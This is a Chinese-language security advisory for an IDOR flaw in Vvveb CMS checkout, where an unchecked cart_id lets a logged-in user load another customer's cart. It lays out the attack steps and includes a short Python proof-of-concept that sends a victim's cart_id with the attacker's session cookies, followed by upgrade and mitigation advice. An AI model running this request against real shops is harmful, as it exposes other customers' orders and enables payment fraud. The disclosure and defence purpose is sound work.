CVE-2026-46408 CVSS 7.6 高危

CVE-2026-46408 Vvveb CMS结账越权漏洞

披露日期: 2026-05-15

来源: [email protected]

漏洞信息

漏洞编号

CVE-2026-46408

漏洞类型

IDOR（不安全的直接对象引用）

CVSS评分

7.6 高危

攻击向量

网络 (AV:N)

认证要求

低权限 (PR:L)

用户交互

无需交互 (UI:N)

影响产品

Vvveb CMS

漏洞概述

Vvveb CMS是一款功能强大的内容管理系统，集成了页面构建器功能。在1.0.8.3版本之前，该系统存在一个严重的安全漏洞。问题出在结账端点上，该端点接受用户控制的cart_id参数，并在未验证购物车所有权的情况下将其用于进入支付流程。这允许经过身份验证的攻击者重用其他用户的购物车数据并在自己的结账会话中使用。攻击者可以利用此漏洞窃取其他用户的订单信息或利用他人的购物车数据进行非法操作，该漏洞在1.0.8.3版本中已得到修复。

技术细节

该漏洞属于不安全的直接对象引用（IDOR）类型的业务逻辑漏洞。在Vvveb CMS的支付模块中，处理结账请求的接口直接使用了客户端提交的cart_id参数来查询和加载购物车数据。由于服务器端缺乏关键的身份验证和授权检查机制，系统没有验证当前登录用户是否拥有该cart_id对应的购物车资源。攻击者只需登录系统，通过拦截请求或直接构造数据包，将cart_id参数修改为目标用户的购物车ID，即可成功调用结账接口。这使得攻击者能够获取受害者购物车中的商品清单、价格信息，甚至可能利用受害者的支付凭证完成支付，导致严重的业务逻辑混乱和财产损失风险。漏洞的根本原因在于过度信任客户端输入而忽略了服务端的权限校验。

攻击链分析

STEP 1

步骤1：信息收集

攻击者发现目标站点运行Vvveb CMS，并确认其版本低于1.0.8.3。

STEP 2

步骤2：身份认证

攻击者注册或使用已有账号登录系统，获取有效的Session Cookie。

STEP 3

步骤3：获取ID

攻击者通过观察或猜测获取目标受害者的购物车ID（cart_id）。

STEP 4

步骤4：发送恶意请求

攻击者修改结账请求，将cart_id替换为受害者的ID，并使用自己的Session发送。

STEP 5

步骤5：完成攻击

服务器端未校验所有权，返回受害者购物车数据，攻击者可利用该数据进行结账。

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

# Proof of Concept for CVE-2026-46408
# Description: IDOR in checkout endpoint allows reusing other users' cart_id
import requests

target_url = "http://target-vvveb-site.com/index.php?module=cart&action=checkout"
# Attacker's session cookie after login
attacker_cookies = {
    "PHPSESSID": "attacker_session_id_here",
    "vvveb_user_session": "attacker_token_here"
}

# Victim's cart ID (guessed or leaked)
victim_cart_id = "12345"

# Payload data
payload = {
    "cart_id": victim_cart_id,
    "payment_method": "cod"
}

try:
    # Send request to checkout with victim's cart_id
    response = requests.post(target_url, data=payload, cookies=attacker_cookies)
    if response.status_code == 200 and "checkout" in response.text:
        print("[+] Exploit successful: Checkout initiated with victim's cart.")
        print("[+] Response snippet:", response.text[:200])
    else:
        print("[-] Exploit failed or cart not found.")
except Exception as e:
    print(f"Error: {e}")

影响范围

Vvveb < 1.0.8.3

防御指南

临时缓解措施

建议立即将系统升级至修复版本1.0.8.3。如果无法立即升级，应在Web应用防火墙（WAF）层面对结账接口的cart_id参数实施严格的格式验证和频率限制，防止攻击者进行批量枚举或重放攻击。同时，管理员应审查系统日志，检查是否存在异常的结账行为或购物车ID篡改记录。

参考链接

快速导航: 前沿安全最新收录域名列表最新威胁情报列表最新网站排名列表最新工具资源列表最新CVE漏洞列表